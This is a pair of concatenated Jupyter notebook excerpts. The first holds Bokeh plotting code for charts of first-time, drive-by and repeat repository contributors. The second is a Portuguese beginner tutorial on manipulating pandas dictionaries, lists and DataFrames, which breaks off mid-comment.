#if 
competitor grouping is enabled turn all repo names, other than the ones in the 'not_aliased_repos' into an alias if display_grouping == 'competitors' and not repo_id in not_aliased_repos: repo_name = 'Repo ' + repo_alias_dict[count] #add repo_id to list of aliased repos, this is used for ordering aliased_repos.append(repo_id) count += 1 #add repo_id and repo names as key value pairs into a dict, this is used to label the title of the visualizations repo_dict.update({repo_id : repo_name}) #gurantees that the non_aliased repos come first when display grouping is set as 'competitors' repo_list = not_aliased_repos + aliased_repos #gurantee that the 'repo_list' only includes repos from the main 'repo_set' for repo_id in repo_list: if repo_id not in repo_set: repo_list.remove(repo_id) display(repo_dict) ``` # Start Visualization Methods ``` #import visualization libraries from bokeh.io import output_notebook, show, export_png from bokeh.plotting import figure from bokeh.models import Label, LabelSet, ColumnDataSource, Legend from bokeh.palettes import Colorblind from bokeh.layouts import gridplot from bokeh.transform import cumsum from math import pi ``` ### New Contributors Bar Chart ``` def vertical_bar_chart(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: {} {} Time Contributors Per {}", required_contributions = 4, required_time = 5): contributor_types = ['All', 'repeat', 'drive_by'] ranks = [1,2] #determine if a list or integer is the input, and create a list if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for rank in ranks: for contributor_type in contributor_types: #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors if (rank == 2 and contributor_type == 'drive_by') or (rank == 2 and contributor_type == 'repeat'): continue #do not display these 
visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #create separate repeat_df that includes all repeat contributors #then any contributor that is not in the repeat_df is a drive-by contributor repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since those are the dates needed for visualization repeats_df = repeats_df.loc[driver_df['rank'] == 1] #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = 
repeats_df.loc[repeats_df['differences'] <= required_time * 86400] if contributor_type == 'repeat': driver_df = repeats_df caption = """This graph shows repeat contributors in the specified time period. Repeat contributors are contributors who have made {} or more contributions in {} days and their first contribution is in the specified time period. New contributors are individuals who make their first contribution in the specified time period.""" elif contributor_type == 'drive_by': #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df driver_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows drive by contributors in the specified time period. Drive by contributors are contributors who make less than the required {} contributions in {} days. New contributors are individuals who make their first contribution in the specified time period. Of course, then, “All drive-by’s are by definition first time contributors”. However, not all first time contributors are drive-by’s.""" elif contributor_type == 'All': if rank == 1: #makes df with all first time contributors driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows all the first time contributors, whether they contribute once, or contribute multiple times. 
New contributors are individuals who make their first contribution in the specified time period.""" if rank == 2: #creates df with all second time contributors driver_df = driver_df.loc[driver_df['rank'] == 2] caption = """This graph shows the second contribution of all first time contributors in the specified time period.""" y_axis_label = 'Second Time Contributors' #filter by end_date, this is not done with the begin date filtering because a repeat contributor will look like drive-by if the second contribution is removed by end_date filtering mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #adds all months to driver_df so the lists of dates will include all months and years driver_df = pd.concat([driver_df, months_df]) data = pd.DataFrame() if group_by == 'year': data['dates'] = driver_df[group_by].unique() #new contributor counts for y-axis data['new_contributor_counts'] = driver_df.groupby([group_by]).sum().reset_index()[y_axis] #used to format x-axis and title group_by_format_string = "Year" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) #new contributor counts for y-axis data['new_contributor_counts'] = driver_df.groupby([date_column]).sum().reset_index()[y_axis] #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 870 pixel so the title fits if len(data['new_contributor_counts']) >= 15: plot_width = 46 * len(data['new_contributor_counts']) else: plot_width = 870 #create a dict convert an integer number into a word #used to turn the rank into a word, 
so it is nicely displayed in the title numbers = ['Zero', 'First', 'Second'] num_conversion_dict = {} for i in range(1, len(numbers)): num_conversion_dict[i] = numbers[i] number = '{}'.format(num_conversion_dict[rank]) #define pot for bar chart p = figure(x_range=data['dates'], plot_height=400, plot_width = plot_width, title=title.format(repo_dict[repo_id], contributor_type.capitalize(), number, group_by_format_string), y_range=(0, max(data['new_contributor_counts'])* 1.15), margin = (0, 0, 10, 0)) p.vbar(x=data['dates'], top=data['new_contributor_counts'], width=0.8) source = ColumnDataSource(data=dict(dates=data['dates'], new_contributor_counts=data['new_contributor_counts'])) #add contributor_count labels to chart p.add_layout(LabelSet(x='dates', y='new_contributor_counts', text='new_contributor_counts', y_offset=4, text_font_size="13pt", text_color="black", source=source, text_align='center')) p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "18px" p.yaxis.axis_label = 'Second Time Contributors' if rank == 2 else 'New Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" plot = p #creates plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) p.add_layout(Label( x = 0, # Change to shift caption left or right y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', # Use same font as paper text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #puts plots together into a grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 
'new_contributors_stacked_bar' + '_' + contributor_type + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) #vertical_bar_chart(df, months_df, repo_id =25502, group_by = group_by, required_contributions = num_contributions_required, required_time = time) ``` ### New Contributors Action Stacked Bar Chart ``` def vertical_stacked_bar_chart(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: {} {} Time Contributors Per {}", required_contributions = 4, required_time = 5): contributor_types = ['All', 'repeat', 'drive_by'] ranks = [1,2] #determine if a list or integer is the input, and create a list if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for rank in ranks: for contributor_type in contributor_types: #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors if (rank == 2 and contributor_type == 'drive_by') or (rank == 2 and contributor_type == 'repeat'): continue #do not display these visualizations since drive-by's do not have second contributions, and the second contribution of a repeat contributor is the same thing as the all the second time contributors for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #create separate repeat_df that includes all repeat contributors #then any contributor that is not in the repeat_df is a drive-by contributor repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df 
= repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since those are the dates needed for visualization repeats_df = repeats_df.loc[driver_df['rank'] == 1] #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] if contributor_type == 'repeat': driver_df = repeats_df caption = """This graph shows repeat contributors in the specified time period. Repeat contributors are contributors who have made {} or more contributions in {} days and their first contribution is in the specified time period. 
New contributors are individuals who make their first contribution in the specified time period.""" elif contributor_type == 'drive_by': #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df driver_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows drive by contributors in the specified time period. Drive by contributors are contributors who make less than the required {} contributions in {} days. New contributors are individuals who make their first contribution in the specified time period. Of course, then, “All drive-by’s are by definition first time contributors”. However, not all first time contributors are drive-by’s.""" elif contributor_type == 'All': if rank == 1: #makes df with all first time contributors driver_df = driver_df.loc[driver_df['rank'] == 1] caption = """This graph shows all the first time contributors, whether they contribute once, or contribute multiple times. 
New contributors are individuals who make their first contribution in the specified time period.""" if rank == 2: #creates df with all second time contributor driver_df = driver_df.loc[driver_df['rank'] == 2] caption = """This graph shows the second contribution of all first time contributors in the specified time period.""" y_axis_label = 'Second Time Contributors' #filter by end_date, this is not done with the begin date filtering because a repeat contributor will look like drive-by if the second contribution is removed by end_date filtering mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #adds all months to driver_df so the lists of dates will include all months and years driver_df = pd.concat([driver_df, months_df]) actions = ['open_pull_request', 'pull_request_comment', 'commit', 'issue_closed', 'issue_opened', 'issue_comment'] data = pd.DataFrame() if group_by == 'year': #x-axis dates data['dates'] = driver_df[group_by].unique() for contribution_type in actions: data[contribution_type] = pd.concat([driver_df.loc[driver_df['action'] == contribution_type], months_df]).groupby(group_by).sum().reset_index()[y_axis] #new contributor counts for all actions data['new_contributor_counts'] = driver_df.groupby([group_by]).sum().reset_index()[y_axis] #used to format x-axis and graph title group_by_format_string = "Year" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) #new_contributor counts for each type of action for contribution_type in actions: data[contribution_type] = pd.concat([driver_df.loc[driver_df['action'] == 
contribution_type], months_df]).groupby(date_column).sum().reset_index()[y_axis] #new contributor counts for all actions data['new_contributor_counts'] = driver_df.groupby([date_column]).sum().reset_index()[y_axis] #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 870 pixel so the title fits if len(data['new_contributor_counts']) >= 15: plot_width = 46 * len(data['new_contributor_counts']) + 200 else: plot_width = 870 #create list of values for data source dict actions_df_references = [] for action in actions: actions_df_references.append(data[action]) #created dict with the actions as the keys, and the values as the values from the df data_source = {actions[i]: actions_df_references[i] for i in range(len(actions))} data_source.update( {'dates' : data['dates'], 'New Contributor Counts': data['new_contributor_counts']} ) colors = Colorblind[len(actions)] source = ColumnDataSource(data=data_source) #create a dict convert an integer number into a word #used to turn the rank into a word, so it is nicely displayed in the title numbers = ['Zero', 'First', 'Second'] num_conversion_dict = {} for i in range(1, len(numbers)): num_conversion_dict[i] = numbers[i] number = '{}'.format(num_conversion_dict[rank]) #y_max = 20 #creates plot to hold chart p = figure(x_range=data['dates'], plot_height=400, plot_width = plot_width, title=title.format(repo_dict[repo_id], contributor_type.capitalize(), number, group_by_format_string), toolbar_location=None, y_range=(0, max(data['new_contributor_counts'])* 1.15)) #max(data['new_contributor_counts'])* 1.15), margin = (0, 0, 0, 0)) vbar = p.vbar_stack(actions, x='dates', width=0.8, color=colors, source=source) #add total count labels p.add_layout(LabelSet(x='dates', y='New Contributor Counts', text='New Contributor Counts', y_offset=4, text_font_size="14pt", text_color="black", source=source, text_align='center')) #add legend legend = Legend(items=[(date, [action]) 
for (date, action) in zip(actions, vbar)], location=(0, 120), label_text_font_size = "16px") p.add_layout(legend, 'right') p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "18px" p.yaxis.axis_label = 'Second Time Contributors' if rank == 2 else 'New Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" plot = p #creates plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) p.add_layout(Label( x = 0, # Change to shift caption left or right y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', # Use same font as paper text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #puts plots together into a grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'new_contributors_stacked_bar' + '_' + contributor_type + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Repeat and Drive By Contributor Counts Pie Chart ``` def pie_chart(input_df, repo_id, title = " {}: Number of Returning Contributors out of {} from {} to {}", required_contributions = 4, required_time = 5): if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = (driver_df['yearmonth'] < begin_date) driver_df= 
driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #determine if contributor is a drive by by finding all the cntrb_id's that do not have a second contribution repeats_df = driver_df.copy() repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() repeats_df = repeats_df.loc[driver_df['rank'] == 1] repeats_df['type'] = 'repeat' differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() drive_by_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] drive_by_df = drive_by_df.loc[driver_df['rank'] == 1] drive_by_df['type'] = 'drive_by' driver_df = pd.concat([drive_by_df, repeats_df]) #filter df by end date mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #first and second time contributor counts drive_by_contributors = driver_df.loc[driver_df['type'] == 'drive_by'].count()['new_contributors'] repeat_contributors = driver_df.loc[driver_df['type'] == 'repeat'].count()['new_contributors'] #create a dict with the # of drive-by and repeat contributors x = {'Drive_By': drive_by_contributors, 'Repeat' : repeat_contributors} #turn dict 'x' into a dataframe with columns 'contributor_type', and 'counts' data = pd.Series(x).reset_index(name='counts').rename(columns={'index':'contributor_type'}) data['angle'] = 
data['counts']/data['counts'].sum() * 2*pi data['color'] = ('#0072B2', '#E69F00') data['percentage'] = ((data['angle']/(2*pi))*100).round(2) #format title title = title.format(repo_dict[repo_id], drive_by_contributors + repeat_contributors, begin_date, end_date) title_text_font_size = 18 plot_width = 850 #sets plot_width to width of title if title is wider than 850 pixels if len(title) * title_text_font_size / 2 > plot_width: plot_width = int(len(title) * title_text_font_size / 2) source = ColumnDataSource(data) #creates plot for chart p = figure(plot_height=450, plot_width =plot_width, title=title, toolbar_location=None, x_range=(-0.5, 1.3), tools = 'hover', tooltips = "@contributor_type", margin = (0, 0, 0, 0)) wedge = p.wedge(x=0.87, y=1, radius=0.4, start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'), line_color=None, fill_color='color', legend_field='contributor_type', source=data) start_point = 0.88 for i in range(0, len(data['percentage'])): #percentages p.add_layout(Label(x=-0.17, y= start_point + 0.13*(len(data['percentage']) - 1 - i), text='{}%'.format(data.iloc[i]['percentage']), render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #contributors p.add_layout(Label(x=0.12, y= start_point + 0.13*(len(data['percentage']) - 1 - i), text='{}'.format(data.iloc[i]['counts']), render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #percentages header p.add_layout(Label(x=-0.22, y= start_point + 0.13*(len(data['percentage'])), text='Percentages', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #legend header p.add_layout(Label(x=-0.43, y= start_point + 0.13*(len(data['percentage'])), text='Category', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) #contributors header p.add_layout(Label(x=0, y= start_point + 0.13*(len(data['percentage'])), text='# Contributors', render_mode='css', text_font_size = '15px', text_font_style= 'bold')) p.axis.axis_label=None 
p.axis.visible=False p.grid.grid_line_color = None p.title.align = "center" p.title.text_font_size = "{}px".format(title_text_font_size) p.legend.location = "center_left" p.legend.border_line_color = None p.legend.label_text_font_style = 'bold' p.legend.label_text_font_size = "15px" plot = p #creates plot for caption p = figure(width = 850, height=200, margin = (0, 0, 0, 0)) caption= """This pie chart shows the percentage of new contributors who were drive-by or repeat contributors. Drive by contributors are contributors who make less than the required {0} contributions in {1} days. New contributors are individuals who make their first contribution in the specified time period. Repeat contributors are contributors who have made {0} or more contributions in {1} days and their first contribution is in the specified time period.""" p.add_layout(Label( x = 0, y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #put graph and caption plot together into one grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'pie_chart' + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Repeat and Drive-by Contributor Counts Stacked Bar Chart ``` def vertical_stacked_bar_chart_2(input_df, months_df, repo_id, group_by, y_axis='new_contributors', title = "{}: Drive By and Repeat Contributor Counts per {}", required_contributions= 5, required_time=100): if type(repo_id) == type(repo_list): repo_ids = repo_id else: repo_ids = [repo_id] for repo_id in repo_ids: output_notebook() #create a copy of contributor dataframe driver_df = input_df.copy() #filter dataframe by repo_id driver_df = driver_df.loc[driver_df['repo_id'] == repo_id] #remove first time contributors before begin date, along with their second contribution mask = 
(driver_df['yearmonth'] < begin_date) driver_df= driver_df[~driver_df['cntrb_id'].isin(driver_df.loc[mask]['cntrb_id'])] #determine if contributor is a drive by by finding all the cntrb_id's that do not have a second contribution repeats_df = driver_df.copy() #discards rows other than the first and the row required to be a repeat contributor repeats_df = repeats_df.loc[repeats_df['rank'].isin([1,required_contributions])] #removes all the contributors that only have a first contirbution repeats_df = repeats_df[repeats_df['cntrb_id'].isin(repeats_df.loc[driver_df['rank'] == required_contributions]['cntrb_id'])] #create lists of 'created_at' times for the final required contribution and the first contribution repeat_list = repeats_df.loc[driver_df['rank'] == required_contributions]['created_at'].tolist() first_list = repeats_df.loc[driver_df['rank'] == 1]['created_at'].tolist() #only keep first time contributions, since there only needs to be one instance of each 'cntrb_id' in df repeats_df = repeats_df.loc[driver_df['rank'] == 1] repeats_df['type'] = 'repeat' #create list of time differences between the final required contribution and the first contribution, and add it to the df differences = [] for i in range(0, len(repeat_list)): time_difference = repeat_list[i] - first_list[i] total = time_difference.days * 86400 + time_difference.seconds differences.append(total) repeats_df['differences'] = differences #remove contributions who made enough contributions, but not in a short enough time repeats_df = repeats_df.loc[repeats_df['differences'] <= required_time * 86400] #create list of 'cntrb_ids' for repeat contributors repeat_cntrb_ids = repeats_df['cntrb_id'].to_list() #create df with all contributors other than the ones in the repeats_df drive_by_df = driver_df.loc[~driver_df['cntrb_id'].isin(repeat_cntrb_ids)] #filter df so it only includes the first contribution drive_by_df = drive_by_df.loc[driver_df['rank'] == 1] drive_by_df['type'] = 'drive_by' driver_df = 
pd.concat([drive_by_df, repeats_df, months_df]) #filter by end_date mask = (driver_df['yearmonth'] < end_date) driver_df = driver_df.loc[mask] #create df to hold data needed for chart data = pd.DataFrame() if group_by == 'year': #x-axis dates data['dates'] = driver_df[group_by].unique() data['repeat_counts'] = driver_df.loc[driver_df['type'] == 'repeat'].groupby(group_by).count().reset_index()[y_axis] data['drive_by_counts'] = driver_df.loc[driver_df['type'] == 'drive_by'].groupby(group_by).count().reset_index()[y_axis] #new contributor counts for all contributor counts total_counts = [] for i in range(0, len(data['drive_by_counts'])): total_counts.append(data.iloc[i]['drive_by_counts'] + data.iloc[i]['repeat_counts']) data['total_counts'] = total_counts #used to format x-axis and graph title group_by_format_string = "Year" #font size of drive by and repeat labels label_text_font_size = "14pt" elif group_by == 'quarter' or group_by == 'month': #set variables to group the data by quarter or month if group_by == 'quarter': date_column = 'quarter' group_by_format_string = "Quarter" elif group_by == 'month': date_column = 'yearmonth' group_by_format_string = "Month" #modifies the driver_df[date_column] to be a string with year and month, then finds all the unique values data['dates'] = np.unique(np.datetime_as_string(driver_df[date_column], unit = 'M')) data['drive_by_counts'] = pd.concat([driver_df.loc[driver_df['type'] == 'drive_by'], months_df]).groupby(date_column).sum().reset_index()[y_axis] data['repeat_counts'] = pd.concat([driver_df.loc[driver_df['type'] == 'repeat'], months_df]).groupby(date_column).sum().reset_index()[y_axis] #new contributor counts for all contributor types total_counts = [] for i in range(0, len(data['drive_by_counts'])): total_counts.append(data.iloc[i]['drive_by_counts'] + data.iloc[i]['repeat_counts']) data['total_counts'] = total_counts #font size of drive by and repeat labels label_text_font_size = "13pt" data_source = {'Dates' : 
data['dates'], 'Drive By' : data['drive_by_counts'], 'Repeat' : data['repeat_counts'], 'All' : data['total_counts']} groups = ["Drive By", "Repeat"] colors = ['#56B4E9', '#E69F00'] source = ColumnDataSource(data=data_source) #format title title_text_font_size = 18 title = title.format(repo_dict[repo_id], group_by_format_string) #if the data set is large enough it will dynamically assign the width, if the data set is too small it will by default set to 780 pixel so the title fits if len(data['total_counts']) >= 13: plot_width = 46 * len(data['total_counts']) + 210 else: plot_width = 780 p = figure(x_range=data['dates'], plot_height=500, plot_width = plot_width, title=title, toolbar_location=None, y_range=(0, max(total_counts)* 1.15), margin = (0, 0, 0, 0)) vbar = p.vbar_stack(groups, x='Dates', width=0.8, color=colors, source=source) #add total counts above bars p.add_layout(LabelSet(x='Dates', y='All', text='All', y_offset=8, text_font_size="14pt", text_color="black", source=source, text_align='center')) #add drive by count labels p.add_layout(LabelSet(x='Dates', y='Drive By', text='Drive By', y_offset=-22, text_font_size=label_text_font_size, text_color="black", source=source, text_align='center')) #add repeat count labels p.add_layout(LabelSet(x='Dates', y='All', text='Repeat', y_offset=-22, text_font_size=label_text_font_size, text_color="black", source=source, text_align='center')) #add legend legend = Legend(items=[(date, [group]) for (date, group) in zip(groups, vbar)], location=(0, 200), label_text_font_size = "16px") p.add_layout(legend, 'right') p.xgrid.grid_line_color = None p.y_range.start = 0 p.axis.minor_tick_line_color = None p.outline_line_color = None p.title.align = "center" p.title.text_font_size = "{}px".format(title_text_font_size) p.yaxis.axis_label = '# Contributors' p.xaxis.axis_label = group_by_format_string p.xaxis.axis_label_text_font_size = "18px" p.yaxis.axis_label_text_font_size = "16px" p.xaxis.major_label_text_font_size = "16px" 
p.xaxis.major_label_orientation = 45.0 p.yaxis.major_label_text_font_size = "16px" p.legend.label_text_font_size = "20px" plot = p #add plot to hold caption p = figure(width = plot_width, height=200, margin = (0, 0, 0, 0)) caption = """This graph shows the number of new contributors in the specified time period, and indicates how many were drive-by and repeat contributors. Drive by contributors are contributors who make less than the required {0} contributions in {1} days. New contributors are individuals who make their first contribution in the specified time period. Repeat contributors are contributors who have made {0} or more contributions in {1} days and their first contribution is in the specified time period.""" p.add_layout(Label( x = 0, y = 160, x_units = 'screen', y_units = 'screen', text='{}'.format(caption.format(num_contributions_required, time)), text_font = 'times', text_font_size = '15pt', render_mode='css' )) p.outline_line_color = None caption_plot = p #put graph and caption plot together into one grid grid = gridplot([[plot], [caption_plot]]) show(grid) if save_files: output_file = 'images/' + 'repeat_and_drive_by_stacked_bar' + '_' + group_by + '_' + repo_dict[repo_id] + '.png' export_png(grid, filename=output_file) ``` ### Function Calls to Create Report ``` if display_grouping == 'repo': for repo_id in repo_set: vertical_bar_chart(df, months_df, repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart(df, months_df, repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) pie_chart(df, repo_id=repo_id, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart_2(df, months_df,repo_id = repo_id, group_by = group_by, required_contributions = num_contributions_required, required_time = time) elif display_grouping == 'competitors': vertical_bar_chart(df, months_df, 
repo_id = repo_list, group_by = group_by, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart(df, months_df, repo_id = repo_list , group_by = group_by, required_contributions = num_contributions_required, required_time = time) pie_chart(df, repo_id=repo_list, required_contributions = num_contributions_required, required_time = time) vertical_stacked_bar_chart_2(df, months_df,repo_id = repo_list, group_by = group_by, required_contributions = num_contributions_required, required_time = time) ```
github_jupyter
# AceleraDev Codenation - Semana 2 ### Túlio Vieira de Souza | Data Scientist ## Manipulando Dados (Pré-Processamento) #### 1. Importando as Bibliotecas Necessárias ``` #Importing libraries import pandas as pd import numpy as np #Acessing the help from pandas (pd) package pd? ``` #### 2. Manipulando Dicionários ``` #Creating a dictionary with data dados = {'canal_venda' : ['facebook', 'twitter', 'instagram', 'linkedin', 'facebook'], 'acessos': [100, 200, 300 ,400, 500], 'site': ['site1', 'site1', 'site2', 'site2', 'site3'], 'vendas': [1000.52, 1052.34, 2002, 5000, 300]} #Showing the 'dados' dictionary created dados #Checking the type from the variable 'dados' type(dados) #Acessing the keys from the 'dados' dictionary dados.keys() #Acessing a specific key in the 'dados' dictionary (In this case, the key 'site') dados['site'] #Acessing a specific position from a specific key in the 'dados' dictionary (In this case, the position 2) dados['acessos'][2] #Acessing another specific position from a specific key in the 'dados' dictionary (In this case, the position 3) dados['canal_venda'][3] #Acessing a specific positions from a specific key in the 'dados' dictionary (In this case, the positions 0, 1, 2) dados['canal_venda'][:3] ``` #### 3. Manipulando Listas ``` #Creating a list named 'lista' lista = [200, 200, 300, 800, 200] #Checking the type from the 'lista' variable type([1,2,3]) #Showing the 'lista' list lista #Picking a specific value from the 'lista' list lista[1] #Picking a slice of values from the 'lista list lista[:3] #Adding the 'lista' list to the 'dados' dictionary dados['lista'] = lista #Showing the updated 'dados' dictionary dados ``` #### 4. 
Manipulando DataFrames ``` #Creating a dataframe named 'dataframe' from the 'dados' dictionary dataframe = pd.DataFrame(dados) #Showing the 'dataframe' dataframe dataframe #Showing the 2 first rows from the 'dataframe' dataframe dataframe.head(2) #Checking the format (number of rows and columns) from the 'dataframe' dataframe dataframe.shape #Checking the index from the 'dataframe' dataframe dataframe.index #Checking the types from the data columns presenting in the 'dataframe' dataframe dataframe.dtypes #Counting the types from the data columns presenting in the 'dataframe' dataframe dataframe.dtypes.value_counts() #Checking for NaN (Not a Number) values in the 'dataframe' dataframe dataframe.isna() #Sum all the NaN (Not a Number) values in the columns from 'dataframe' dataframe dataframe.isna().sum() #Showing the columns names from the 'dataframe' dataframe dataframe.columns #Showing a specific column from the 'dataframe' dataframe dataframe['canal_venda'] #Creating and showing a new column in the 'dataframe' dataframe dataframe['nova_coluna'] = [1, 2, 3, 4, 5] dataframe #Showing the new columns names from the 'dataframe' dataframe dataframe.columns #Showing the 'dataframe' dataframe without some columns (In this case, the columns 'acessos', 'site', 'canal_venda)') dataframe.drop(columns=['acessos', 'site', 'canal_venda']) #Removing the 'nova_coluna' column from the dataframe dataframe.drop(columns='nova_coluna', inplace=True) dataframe #Showing again the columns from the 'dataframe' dataframe dataframe.columns #Acessing a specific value from a specific column named 'acessos' in the 'dataframe' dataframe dataframe['acessos'][1] #Acessing a specific slice from a specific column named 'canal_venda' in the 'dataframe' datafrane dataframe['canal_venda'][:2] #Slicing the data from 'dataframe' dataframe with iloc[rows, columns] dataframe.iloc[3:,:] #Slicing the data from 'dataframe' dataframe with the index 